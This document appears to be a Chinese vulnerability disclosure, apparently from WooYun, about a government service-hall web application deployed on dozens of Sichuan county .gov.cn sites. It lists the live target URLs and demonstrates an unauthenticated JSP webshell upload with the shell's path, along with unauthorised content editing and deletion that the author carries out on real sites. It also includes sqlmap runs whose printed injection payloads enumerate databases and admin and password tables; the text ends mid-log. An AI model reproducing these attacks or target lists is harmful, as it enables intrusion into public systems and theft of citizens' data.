注:getshell重复: WooYun: 四川省各地政务服务大厅Getshell漏洞(四川各地方县市大厅通用) 0x1
无需登录getshell:
下面随便提取几个站做演示: http://egov.fszw.cn:8080/pages/offLine/questerOffLine.jsp http://egov.pzhzw.gov.cn:8080/pages/offLine/questerOffLine.jsp http://egov.scdongqu.gov.cn:8080/pages/offLine/questerOffLine.jsp http://egov.pzhsxq.gov.cn:8080/pages/offLine/questerOffLine.jsp http://egov.hjxzwzx.gov.cn:8080/pages/offLine/questerOffLine.jsp http://egov.glzwzx.gov.cn:8080/pages/offLine/questerOffLine.jsp http://egov.ljzw.gov.cn:8080/pages/offLine/questerOffLine.jsp http://egov.scnczw.gov.cn:8080/pages/offLine/questerOffLine.jsp http://egov.wangcangzw.gov.cn:8080/pages/offLine/questerOffLine.jsp
在这就用这个站做演示吧: http://egov.wangcangzw.gov.cn:8080/pages/offLine/questerOffLine.jsp
直接上传jsp马,上传成功直接审查元素或者查看源码
<a onclick="downloadAttachment('1.jsp','D:/J2EE/TongWeb5.0/autodeploy/kb.war/questerOffLine/b41dc16800b64c0cabf394a1440f6434.jsp');" style="cursor: hand;" target="_blank">1.jsp </a> <a onclick="delAttachment('26b63664135e4b40a99673161e1fcab2');" style="cursor: hand;"> 删除</a><br/>
注意此处路径,正确路径为:
questerOffLine/b41dc16800b64c0cabf394a1440f6434.jsp
好,我们试着打开我们可爱的马看看。
http://egov.wangcangzw.gov.cn:8080/questerOffLine/b41dc16800b64c0cabf394a1440f6434.jsp
成功。 0x2
越权1:
越权文件:servlet/search?state=2
http://www.zljzw.gov.cn:8080/servlet/search?state=2 http://egov.zgytzw.gov.cn:8080/servlet/search?state=2 http://egov.rxzw.gov.cn:8080/servlet/search?state=2 http://egov.fszw.cn:8080/servlet/search?state=2 http://egov.pzhzw.gov.cn:8080/servlet/search?state=2 http://egov.scdongqu.gov.cn:8080/servlet/search?state=2 http://egov.pzhsxq.gov.cn:8080/servlet/search?state=2 http://egovrh.pzhzw.gov.cn:8080/servlet/search?state=2 http://egov.lzjyzw.gov.cn:8080/servlet/search?state=2 http://www.sclxzw.gov.cn:8080/servlet/search?state=2 http://egov.hjxzwzx.gov.cn:8080/servlet/search?state=2 http://egov.xyzwzx.gov.cn:8080/servlet/search?state=2 http://egov.longmatan.gov.cn:8080/servlet/search?state=2 http://egov.naxi.gov.cn:8080/servlet/search?state=2 http://egov.glzwzx.gov.cn:8080/servlet/search?state=2 http://egov.dyzw.gov.cn:8080/servlet/search?state=2 http://egov.ghzw.gov.cn:8080/servlet/search?state=2 http://egov.ljzw.gov.cn:8080/servlet/search?state=2 http://egov.zjzw.dyzw.gov.cn:8080/servlet/search?state=2 http://egov.sfzw.gov.cn:8080/servlet/search?state=2 http://egov.jyzw.dyzw.gov.cn:8080/servlet/search?state=2 http://egov.gyzwfw.gov.cn:8080/servlet/search?state=2 http://egov.cxzw.gov.cn:8080/servlet/search?state=2 http://egov.lzzwfw.gov.cn:8080/servlet/search?state=2 http://egov.jgzw.gov.cn:8080/servlet/search?state=2 http://egov.wangcangzw.gov.cn:8080/servlet/search?state=2 http://egov.gyybzw.gov.cn:8080/servlet/search?state=2 http://egov.gyctzw.gov.cn:8080/servlet/search?state=2 http://egov.qczw.gov.cn:8080/servlet/search?state=2 http://egov.scsn.gov.cn:8080/servlet/search?state=2 http://egov.wtq.gov.cn:8080/servlet/search?state=2 http://egov.shawan.gov.cn:8080/servlet/search?state=2 http://egov.jingyan.gov.cn:8080/servlet/search?state=2 http://egov.lsszq.gov.cn:8080/servlet/search?state=2 http://egov.emeishan.gov.cn:8080/servlet/search?state=2 http://egov.eb.gov.cn:8080/servlet/search?state=2 http://egov.qwzw.gov.cn:8080/servlet/search?state=2 http://egov.jiajiang.gov.cn:8080/servlet/search?state=2 http://egov.muchuan.gov.cn:8080/servlet/search?state=2 http://egov.jkh.gov.cn:8080/servlet/search?state=2 http://egov.mabian.gov.cn:8080/servlet/search?state=2 http://egov.scnczw.gov.cn:8080/servlet/search?state=2
随机点一个:
我们就试着修改它看看:
修改完它会自动跳到未审定这块,我们点击到已发布。
这是我们刚刚修改的 我们打开看看越权修改成功不。
越权1
成功。 0x3
越权2:
越权文件:MyJsp.jsp
我个人测试都是通杀的,下面就随便拿一个站测试, http://egov.fszw.cn:8080/MyJsp.jsp
在这我们随便删除一个文件试试。
成功删除掉00183那个。
越权2
成功。 0x4
越权3:
越权文件:dictpages/frameIndex.jsp
http://egov.fszw.cn:8080/dictpages/frameIndex.jsp
一样是可以添加发布删除,就不做演示了。 0x5
注入1
http://egov.zgdazw.gov.cn:8080/servlet/view?qid=4 http://www.zljzw.gov.cn:8080/servlet/view?qid=4 http://egov.zgytzw.gov.cn:8080/servlet/view?qid=4 http://egov.rxzw.gov.cn:8080/servlet/view?qid=4 http://egov.fszw.cn:8080/servlet/view?qid=4 http://egov.pzhzw.gov.cn:8080/servlet/view?qid=4 http://egov.scdongqu.gov.cn:8080/servlet/view?qid=4 http://egov.pzhsxq.gov.cn:8080/servlet/view?qid=4 http://egovrh.pzhzw.gov.cn:8080/servlet/view?qid=4 http://egov.lzjyzw.gov.cn:8080/servlet/view?qid=4 http://www.sclxzw.gov.cn:8080/servlet/view?qid=4 http://egov.hjxzwzx.gov.cn:8080/servlet/view?qid=4 http://egov.xyzwzx.gov.cn:8080/servlet/view?qid=4 http://egov.longmatan.gov.cn:8080/servlet/view?qid=4 http://egov.naxi.gov.cn:8080/servlet/view?qid=4 http://egov.glzwzx.gov.cn:8080/servlet/view?qid=4 http://egov.dyzw.gov.cn:8080/servlet/view?qid=4 http://egov.ghzw.gov.cn:8080/servlet/view?qid=4 http://egov.ljzw.gov.cn:8080/servlet/view?qid=4 http://egov.zjzw.dyzw.gov.cn:8080/servlet/view?qid=4 http://egov.sfzw.gov.cn:8080/servlet/view?qid=4 http://egov.jyzw.dyzw.gov.cn:8080/servlet/view?qid=4 http://egov.gyzwfw.gov.cn:8080/servlet/view?qid=4 http://egov.cxzw.gov.cn:8080/servlet/view?qid=4 http://egov.lzzwfw.gov.cn:8080/servlet/view?qid=4 http://egov.jgzw.gov.cn:8080/servlet/view?qid=4 http://egov.wangcangzw.gov.cn:8080/servlet/view?qid=4 http://egov.gyybzw.gov.cn:8080/servlet/view?qid=4 http://egov.gyctzw.gov.cn:8080/servlet/view?qid=4 http://egov.qczw.gov.cn:8080/servlet/view?qid=4 http://egov.scsn.gov.cn:8080/servlet/view?qid=4 http://egov.wtq.gov.cn:8080/servlet/view?qid=4 http://egov.shawan.gov.cn:8080/servlet/view?qid=4 http://egov.jingyan.gov.cn:8080/servlet/view?qid=4 http://egov.lsszq.gov.cn:8080/servlet/view?qid=4 http://egov.emeishan.gov.cn:8080/servlet/view?qid=4 http://egov.eb.gov.cn:8080/servlet/view?qid=4 http://egov.qwzw.gov.cn:8080/servlet/view?qid=4 http://egov.jiajiang.gov.cn:8080/servlet/view?qid=4 http://egov.muchuan.gov.cn:8080/servlet/view?qid=4 http://egov.jkh.gov.cn:8080/servlet/view?qid=4 http://egov.mabian.gov.cn:8080/servlet/view?qid=4 http://egov.scnczw.gov.cn:8080/servlet/view?qid=4
由于表太多就没跑完
[root@Hacker~]# Sqlmap -u http://egov.zgdazw.gov.cn:8080/servlet/view?qid=4 --ta bles sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon sible for any misuse or damage caused by this program [*] starting at 03:02:48 [03:02:48] [INFO] resuming back-end DBMS 'microsoft sql server' [03:02:48] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: qid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: qid=4 AND 2802=2802 Type: UNION query Title: Generic UNION query (NULL) - 13 columns Payload: qid=-1600 UNION ALL SELECT NULL, CHAR(58)+CHAR(119)+CHAR(99)+CHAR(1 18)+CHAR(58)+CHAR(66)+CHAR(72)+CHAR(99)+CHAR(116)+CHAR(68)+CHAR(112)+CHAR(84)+CH AR(111)+CHAR(122)+CHAR(68)+CHAR(58)+CHAR(118)+CHAR(115)+CHAR(105)+CHAR(58), NULL , NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: qid=4; WAITFOR DELAY '0:0:5';-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: qid=4 WAITFOR DELAY '0:0:5'-- --- [03:02:48] [INFO] the back-end DBMS is Microsoft SQL Server web application technology: JSP, JSP 2.1 back-end DBMS: Microsoft SQL Server 2008 [03:02:48] [INFO] fetching database names [03:02:49] [INFO] the SQL query used returns 13 entries [03:02:49] [INFO] retrieved: "Egh" [03:02:49] [INFO] retrieved: "EghFiles" [03:02:50] [INFO] retrieved: "master" [03:02:50] [INFO] retrieved: "model" [03:02:50] [INFO] retrieved: "msdb" [03:02:50] [INFO] retrieved: "ReportServer" [03:02:50] [INFO] retrieved: "ReportServerTempDB" [03:02:51] [INFO] retrieved: "tempdb" [03:02:51] [INFO] retrieved: "tyfocontent" [03:02:51] [INFO] retrieved: "tyfoinvestigate" [03:02:51] [INFO] retrieved: "tyfomsg" [03:02:52] [INFO] retrieved: "tyfopublish" [03:02:52] [INFO] retrieved: "tyfosearch" [03:02:52] [INFO] fetching tables for databases: Egh, EghFiles, ReportServer, Re portServerTempDB, master, model, msdb, tempdb, tyfocontent, tyfoinvestigate, tyf omsg, tyfopublish, tyfosearch [03:02:53] [INFO] the SQL query used returns 68 entries [03:02:53] [INFO] retrieved: "dbo.AppProject" [03:02:53] [INFO] retrieved: "dbo.Appraise" [03:02:53] [INFO] retrieved: "dbo.BackUserPwd" [03:02:54] [INFO] retrieved: "dbo.Complaints" [03:02:54] [INFO] retrieved: "dbo.ConsultLabel" [03:02:54] [INFO] retrieved: "dbo.ConvenienceCenter" [03:02:54] [INFO] retrieved: "dbo.D99_Tmp" [03:02:55] [INFO] retrieved: "dbo.data_file" [03:02:55] [INFO] retrieved: "dbo.DateSet" [03:02:55] [INFO] retrieved: "dbo.Datum" [03:02:55] [INFO] retrieved: "dbo.datumlegend" [03:02:56] [INFO] retrieved: "dbo.FlowSet" [03:02:56] [INFO] retrieved: "dbo.FlowShip" [03:02:56] [INFO] retrieved: "dbo.FlowTurnOut" [03:02:56] [INFO] retrieved: "dbo.GscApproveConditionSet" [03:02:56] [INFO] retrieved: "dbo.GscDay" [03:02:57] [INFO] retrieved: "dbo.GscOrgan" [03:02:57] [INFO] retrieved: "dbo.GscPubUser" [03:02:57] [INFO] retrieved: "dbo.GscUser" [03:02:57] [INFO] retrieved: "dbo.HandedData" [03:02:58] [INFO] retrieved: "dbo.HandedDataFile" [03:02:58] [INFO] retrieved: "dbo.KB_KEYWORD" [03:02:58] [INFO] retrieved: "dbo.KB_QUESTION_ANSWER" [03:02:58] [INFO] retrieved: "dbo.KB_SAME_KEY" [03:02:59] [INFO] retrieved: "dbo.KB_WORD_QUESTION" [03:02:59] [INFO] retrieved: "dbo.Label_UserPriority" [03:02:59] [INFO] retrieved: "dbo.Log" [03:02:59] [INFO] retrieved: "dbo.MSG_auto_reply" [03:03:00] [INFO] retrieved: "dbo.MSG_CONTENTS" [03:03:00] [INFO] retrieved: "dbo.MSG_NO" [03:03:00] [INFO] retrieved: "dbo.MSG_OverTime" [03:03:01] [INFO] retrieved: "dbo.MSG_POOL" [03:03:01] [INFO] retrieved: "dbo.MSG_QUESTER" [03:03:01] [INFO] retrieved: "dbo.MSG_SATIS" [03:03:01] [INFO] retrieved: "dbo.MSG_WORK_DEPT" [03:03:02] [INFO] retrieved: "dbo.MSG_WORK_ONLINE" [03:03:02] [INFO] retrieved: "dbo.one_tb_data" [03:03:02] [INFO] retrieved: "dbo.one_tb_model" [03:03:02] [INFO] retrieved: "dbo.ORG_ONLINE" [03:03:03] [INFO] retrieved: "dbo.OrganAppWorkStat" [03:03:03] [INFO] retrieved: "dbo.Parallel" [03:03:03] [INFO] retrieved: "dbo.ParallelRelation" [03:03:03] [INFO] retrieved: "dbo.predict" [03:03:04] [INFO] retrieved: "dbo.Prejudication" [03:03:04] [INFO] retrieved: "dbo.Processes" [03:03:04] [INFO] retrieved: "dbo.Projects" [03:03:04] [INFO] retrieved: "dbo.QuesterOffLine" [03:03:04] [INFO] retrieved: "dbo.QuesterOffLineAttach" [03:03:05] [INFO] retrieved: "dbo.RCC_COMPLAINTS" [03:03:05] [INFO] retrieved: "dbo.RCC_LOG" [03:03:05] [INFO] retrieved: "dbo.RCC_REDISSATISFILD" [03:03:05] [INFO] retrieved: "dbo.RCC_REMINDED" [03:03:06] [INFO] retrieved: "dbo.RES_RESERVATION" [03:03:06] [INFO] retrieved: "dbo.SendEmailHistory" [03:03:06] [INFO] retrieved: "dbo.SendEmailList" [03:03:06] [INFO] retrieved: "dbo.SmsAdvice" [03:03:07] [INFO] retrieved: "dbo.Sync" [03:03:07] [INFO] retrieved: "dbo.SyncRecord" [03:03:07] [INFO] retrieved: "dbo.T_Egh_AdminUsers" [03:03:07] [INFO] retrieved: "dbo.T_Egh_SetPastoralPoetry" [03:03:08] [INFO] retrieved: "dbo.T_Front_UserInfo" [03:03:08] [INFO] retrieved: "dbo.T_Mobile_SMSSend" [03:03:08] [INFO] retrieved: "dbo.T_Mobile_SMSSendHistory" [03:03:09] [INFO] retrieved: "dbo.ThisGsc" [03:03:09] [INFO] retrieved: "dbo.TurnOut" [03:03:09] [INFO] retrieved: "dbo.UserKeepDataFile" [03:03:09] [INFO] retrieved: "dbo.UserPower" [03:03:10] [INFO] retrieved: "dbo.WarrntSet" [03:03:10] [INFO] the SQL query used returns 1 entries [03:03:11] [INFO] retrieved: "dbo.data_file" [03:03:12] [INFO] the SQL query used returns 359 entries [03:03:12] [INFO] retrieved: "dbo.spt_fallback_db" [03:03:13] [INFO] retrieved: "dbo.spt_fallback_dev" [03:03:13] [INFO] retrieved: "dbo.spt_fallback_usg" [03:03:14] [INFO] retrieved: "dbo.spt_monitor" [03:03:14] [INFO] retrieved: "dbo.spt_values" [03:03:14] [INFO] retrieved: "INFORMATION_SCHEMA.CHECK_CONSTRAINTS" [03:03:15] [INFO] retrieved: "INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE" [03:03:15] [INFO] retrieved: "INFORMATION_SCHEMA.COLUMN_PRIVILEGES" [03:03:16] [INFO] retrieved: "INFORMATION_SCHEMA.COLUMNS" [03:03:16] [INFO] retrieved: "INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE" [03:03:17] [INFO] retrieved: "INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE" [03:03:17] [INFO] retrieved: "INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS" [03:03:17] [INFO] retrieved: "INFORMATION_SCHEMA.DOMAINS" [03:03:18] [INFO] retrieved: "INFORMATION_SCHEMA.KEY_COLUMN_USAGE" [03:03:18] [INFO] retrieved: "INFORMATION_SCHEMA.PARAMETERS" [03:03:19] [INFO] retrieved: "INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS" [03:03:19] [INFO] retrieved: "INFORMATION_SCHEMA.ROUTINE_COLUMNS" [03:03:19] [INFO] retrieved: "INFORMATION_SCHEMA.ROUTINES" [03:03:20] [INFO] retrieved: "INFORMATION_SCHEMA.SCHEMATA" [03:03:20] [INFO] retrieved: "INFORMATION_SCHEMA.TABLE_CONSTRAINTS" [03:03:21] [INFO] retrieved: "INFORMATION_SCHEMA.TABLE_PRIVILEGES" [03:03:21] [INFO] retrieved: "INFORMATION_SCHEMA.TABLES" [03:03:22] [INFO] retrieved: "INFORMATION_SCHEMA.VIEW_COLUMN_USAGE" [03:03:22] [INFO] retrieved: "INFORMATION_SCHEMA.VIEW_TABLE_USAGE" [03:03:22] [INFO] retrieved: "INFORMATION_SCHEMA.VIEWS" [03:03:23] [INFO] retrieved: "sys.all_columns" [03:03:23] [INFO] retrieved: "sys.all_objects" [03:03:24] [INFO] retrieved: "sys.all_parameters" [03:03:24] [INFO] retrieved: "sys.all_sql_modules" [03:03:25] [INFO] retrieved: "sys.all_views" [03:03:25] [INFO] retrieved: "sys.allocation_units" [03:03:26] [INFO] retrieved: "sys.assemblies" [03:03:26] [INFO] retrieved: "sys.assembly_files" [03:03:26] [INFO] retrieved: "sys.assembly_modules" [03:03:27] [INFO] retrieved: "sys.assembly_references" [03:03:27] [INFO] retrieved: "sys.assembly_types" [03:03:28] [INFO] retrieved: "sys.asymmetric_keys" [03:03:28] [INFO] retrieved: "sys.backup_devices" [03:03:29] [INFO] retrieved: "sys.certificates" [03:03:29] [INFO] retrieved: "sys.change_tracking_databases" [03:03:32] [INFO] retrieved: "sys.change_tracking_tables" [03:03:33] [INFO] retrieved: "sys.check_constraints" [03:03:36] [INFO] retrieved: "sys.column_type_usages" [03:03:37] [INFO] retrieved: "sys.column_xml_schema_collection_usages" [03:03:38] [INFO] retrieved: "sys.columns" [03:03:38] [INFO] retrieved: "sys.computed_columns" [03:03:39] [INFO] retrieved: "sys.configurations" [03:03:39] [INFO] retrieved: "sys.conversation_endpoints" [03:03:39] [INFO] retrieved: "sys.conversation_groups"
0x6
注入2
http://egov.zgdazw.gov.cn:8080/servlet/search?state=0 http://www.zljzw.gov.cn:8080/servlet/search?state=0 http://egov.zgytzw.gov.cn:8080/servlet/search?state=0 http://egov.rxzw.gov.cn:8080/servlet/search?state=0 http://egov.fszw.cn:8080/servlet/search?state=0 http://egov.pzhzw.gov.cn:8080/servlet/search?state=0 http://egov.scdongqu.gov.cn:8080/servlet/search?state=0 http://egov.pzhsxq.gov.cn:8080/servlet/search?state=0 http://egovrh.pzhzw.gov.cn:8080/servlet/search?state=0 http://egov.lzjyzw.gov.cn:8080/servlet/search?state=0 http://www.sclxzw.gov.cn:8080/servlet/search?state=0 http://egov.hjxzwzx.gov.cn:8080/servlet/search?state=0 http://egov.xyzwzx.gov.cn:8080/servlet/search?state=0 http://egov.longmatan.gov.cn:8080/servlet/search?state=0 http://egov.naxi.gov.cn:8080/servlet/search?state=0 http://egov.glzwzx.gov.cn:8080/servlet/search?state=0 http://egov.dyzw.gov.cn:8080/servlet/search?state=0 http://egov.ghzw.gov.cn:8080/servlet/search?state=0 http://egov.ljzw.gov.cn:8080/servlet/search?state=0 http://egov.zjzw.dyzw.gov.cn:8080/servlet/search?state=0 http://egov.sfzw.gov.cn:8080/servlet/search?state=0 http://egov.jyzw.dyzw.gov.cn:8080/servlet/search?state=0 http://egov.gyzwfw.gov.cn:8080/servlet/search?state=0 http://egov.cxzw.gov.cn:8080/servlet/search?state=0 http://egov.lzzwfw.gov.cn:8080/servlet/search?state=0 http://egov.jgzw.gov.cn:8080/servlet/search?state=0 http://egov.wangcangzw.gov.cn:8080/servlet/search?state=0 http://egov.gyybzw.gov.cn:8080/servlet/search?state=0 http://egov.gyctzw.gov.cn:8080/servlet/search?state=0 http://egov.qczw.gov.cn:8080/servlet/search?state=0 http://egov.scsn.gov.cn:8080/servlet/search?state=0 http://egov.wtq.gov.cn:8080/servlet/search?state=0 http://egov.shawan.gov.cn:8080/servlet/search?state=0 http://egov.jingyan.gov.cn:8080/servlet/search?state=0 http://egov.lsszq.gov.cn:8080/servlet/search?state=0 http://egov.emeishan.gov.cn:8080/servlet/search?state=0 http://egov.eb.gov.cn:8080/servlet/search?state=0 http://egov.qwzw.gov.cn:8080/servlet/search?state=0 http://egov.jiajiang.gov.cn:8080/servlet/search?state=0 http://egov.muchuan.gov.cn:8080/servlet/search?state=0 http://egov.jkh.gov.cn:8080/servlet/search?state=0 http://egov.mabian.gov.cn:8080/servlet/search?state=0 http://egov.scnczw.gov.cn:8080/servlet/search?state=0
0x7
注入3
这处注入点有点奇葩,丢sqlmap跑的时候很明显的显示404页面的,但是接着跑既然能跑出来。
http://egov.zgdazw.gov.cn:8080/servlet/kbedit?qid=1 http://www.zljzw.gov.cn:8080/servlet/kbedit?qid=1 http://egov.rxzw.gov.cn:8080/servlet/kbedit?qid=1 http://egovrh.pzhzw.gov.cn:8080/servlet/kbedit?qid=1 http://egov.lzjyzw.gov.cn:8080/servlet/kbedit?qid=1 http://egov.hjxzwzx.gov.cn:8080/servlet/kbedit?qid=1 http://egov.naxi.gov.cn:8080/servlet/kbedit?qid=1 http://egov.glzwzx.gov.cn:8080/servlet/kbedit?qid=1 http://egov.ljzw.gov.cn:8080/servlet/kbedit?qid=1 http://egov.gyzwfw.gov.cn:8080/servlet/kbedit?qid=1 http://egov.cxzw.gov.cn:8080/servlet/kbedit?qid=1 http://egov.lzzwfw.gov.cn:8080/servlet/kbedit?qid=1 http://egov.jgzw.gov.cn:8080/servlet/kbedit?qid=1 http://egov.wangcangzw.gov.cn:8080/servlet/kbedit?qid=1 http://egov.gyybzw.gov.cn:8080/servlet/kbedit?qid=1 http://egov.gyctzw.gov.cn:8080/servlet/kbedit?qid=1 http://egov.qczw.gov.cn:8080/servlet/kbedit?qid=1 http://egov.scsn.gov.cn:8080/servlet/kbedit?qid=1 http://egov.wtq.gov.cn:8080/servlet/kbedit?qid=1 http://egov.shawan.gov.cn:8080/servlet/kbedit?qid=1 http://egov.jingyan.gov.cn:8080/servlet/kbedit?qid=1 http://egov.lsszq.gov.cn:8080/servlet/kbedit?qid=1 http://egov.emeishan.gov.cn:8080/servlet/kbedit?qid=1 http://egov.eb.gov.cn:8080/servlet/kbedit?qid=1 http://egov.qwzw.gov.cn:8080/servlet/kbedit?qid=1 http://egov.jiajiang.gov.cn:8080/servlet/kbedit?qid=1 http://egov.muchuan.gov.cn:8080/servlet/kbedit?qid=1 http://egov.jkh.gov.cn:8080/servlet/kbedit?qid=1 http://egov.mabian.gov.cn:8080/servlet/kbedit?qid=1 http://egov.scnczw.gov.cn:8080/servlet/kbedit?qid=1
[root@Hacker~]# Sqlmap -u http://egov.mabian.gov.cn:8080/servlet/kbedit?qid=1 sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutua consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respo sible for any misuse or damage caused by this program [*] starting at 03:08:01 [03:08:02] [INFO] testing connection to the target url [03:08:02] [INFO] testing if the url is stable, wait a few seconds [03:08:03] [INFO] url is stable [03:08:03] [INFO] testing if GET parameter 'qid' is dynamic <code>sqlmap got a 302 redirect to 'http://egov.mabian.gov.cn:8080/servlet/../404.jsp
. Do you want to follow? [Y/n] y [03:08:06] [INFO] confirming that GET parameter 'qid' is dynamic [03:08:06] [INFO] GET parameter 'qid' is dynamic [03:08:06] [WARNING] reflective value(s) found and filtering out [03:08:06] [WARNING] heuristic test shows that GET parameter 'qid' might not be injectable [03:08:06] [INFO] testing for SQL injection on GET parameter 'qid' [03:08:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [03:08:07] [INFO] GET parameter 'qid' is 'AND boolean-based blind - WHERE or HA ING clause' injectable [03:08:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING claus ' [03:08:07] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [03:08:08] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE r HAVING clause' [03:08:08] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XML ype)' [03:08:08] [INFO] testing 'MySQL > 5.0.11 stacked queries' [03:08:08] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [03:08:09] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [03:08:19] [INFO] GET parameter 'qid' is 'Microsoft SQL Server/Sybase stacked q eries' injectable [03:08:19] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [03:08:19] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [03:08:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [03:08:30] [INFO] GET parameter 'qid' is 'Microsoft SQL Server/Sybase time-base blind' injectable [03:08:30] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' [03:08:30] [INFO] automatically extending ranges for UNION query injection tech ique tests as there is at least one other potential injection technique found [03:08:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [03:08:35] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending he range for current UNION query injection technique test [03:08:36] [INFO] target url appears to have 13 columns in query [03:08:40] [INFO] GET parameter 'qid' is 'Generic UNION query (NULL) - 1 to 20 olumns' injectable GET parameter 'qid' is vulnerable. Do you want to keep testing the others (if a y)? [y/N] y sqlmap identified the following injection points with a total of 63 HTTP(s) req ests: --- Place: GET Parameter: qid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: qid=1 AND 7373=7373 Type: UNION query Title: Generic UNION query (NULL) - 13 columns Payload: qid=-9367 UNION ALL SELECT NULL, CHAR(58)+CHAR(115)+CHAR(102)+CHAR 103)+CHAR(58)+CHAR(110)+CHAR(68)+CHAR(72)+CHAR(76)+CHAR(101)+CHAR(109)+CHAR(114 +CHAR(122)+CHAR(79)+CHAR(87)+CHAR(58)+CHAR(112)+CHAR(101)+CHAR(116)+CHAR(58), N LL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: qid=1; WAITFOR DELAY '0:0:5';-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: qid=1 WAITFOR DELAY '0:0:5'-- --- [03:08:48] [INFO] testing MySQL [03:08:49] [WARNING] the back-end DBMS is not MySQL [03:08:49] [INFO] testing Oracle [03:08:49] [WARNING] the back-end DBMS is not Oracle [03:08:49] [INFO] testing PostgreSQL [03:08:50] [WARNING] the back-end DBMS is not PostgreSQL [03:08:50] [INFO] testing Microsoft SQL Server [03:08:50] [INFO] confirming Microsoft SQL Server [03:08:52] [INFO] the back-end DBMS is Microsoft SQL Server web application technology: JSP, JSP 2.1 back-end DBMS: Microsoft SQL Server 2008 [03:08:52] [INFO] fetched data logged to text files under 'C:\DOCUME~1\ADMINI~1 LOCALS~1\Temp\Rar$EX20.218\SQLMAP~1\Bin\output\egov.mabian.gov.cn'</code>
[root@Hacker~]# Sqlmap -u http://egov.mabian.gov.cn:8080/servlet/kbedit?qid=1 -- tables sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon sible for any misuse or damage caused by this program [*] starting at 03:09:56 [03:09:56] [INFO] resuming back-end DBMS 'microsoft sql server' [03:09:56] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: qid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: qid=1 AND 7373=7373 Type: UNION query Title: Generic UNION query (NULL) - 13 columns Payload: qid=-9367 UNION ALL SELECT NULL, CHAR(58)+CHAR(115)+CHAR(102)+CHAR( 103)+CHAR(58)+CHAR(110)+CHAR(68)+CHAR(72)+CHAR(76)+CHAR(101)+CHAR(109)+CHAR(114) +CHAR(122)+CHAR(79)+CHAR(87)+CHAR(58)+CHAR(112)+CHAR(101)+CHAR(116)+CHAR(58), NU LL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: qid=1; WAITFOR DELAY '0:0:5';-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: qid=1 WAITFOR DELAY '0:0:5'-- --- [03:09:56] [INFO] the back-end DBMS is Microsoft SQL Server web application technology: JSP, JSP 2.1 back-end DBMS: Microsoft SQL Server 2008 [03:09:56] [INFO] fetching database names [03:09:57] [WARNING] reflective value(s) found and filtering out [03:09:57] [INFO] the SQL query used returns 13 entries [03:09:57] [INFO] retrieved: "Egh" [03:09:57] [INFO] retrieved: "EghFiles" [03:09:57] [INFO] retrieved: "master" [03:09:57] [INFO] retrieved: "model" [03:09:58] [INFO] retrieved: "msdb" [03:09:58] [INFO] retrieved: "ReportServer" [03:09:58] [INFO] retrieved: "ReportServerTempDB" [03:09:58] [INFO] retrieved: "tempdb" [03:09:59] [INFO] retrieved: "tyfocontent" [03:09:59] [INFO] retrieved: "tyfoinvestigate" [03:09:59] [INFO] retrieved: "tyfomsg" [03:09:59] [INFO] retrieved: "tyfopublish" [03:10:00] [INFO] retrieved: "tyfosearch" [03:10:00] [INFO] fetching tables for databases: Egh, EghFiles, ReportServer, Re portServerTempDB, master, model, msdb, tempdb, tyfocontent, tyfoinvestigate, tyf omsg, tyfopublish, tyfosearch [03:10:00] [INFO] the SQL query used returns 66 entries [03:10:01] [INFO] retrieved: "dbo.AppProject" [03:10:01] [INFO] retrieved: "dbo.Appraise" [03:10:01] [INFO] retrieved: "dbo.BackUserPwd" [03:10:02] [INFO] retrieved: "dbo.Complaints" [03:10:02] [INFO] retrieved: "dbo.ConsultLabel" [03:10:02] [INFO] retrieved: "dbo.ConvenienceCenter" [03:10:03] [INFO] retrieved: "dbo.D99_Tmp" [03:10:03] [INFO] retrieved: "dbo.data_file" [03:10:03] [INFO] retrieved: "dbo.DateSet" [03:10:04] [INFO] retrieved: "dbo.Datum" [03:10:04] [INFO] retrieved: "dbo.datumlegend" [03:10:04] [INFO] retrieved: "dbo.FlowSet" [03:10:04] [INFO] retrieved: "dbo.FlowShip" [03:10:05] 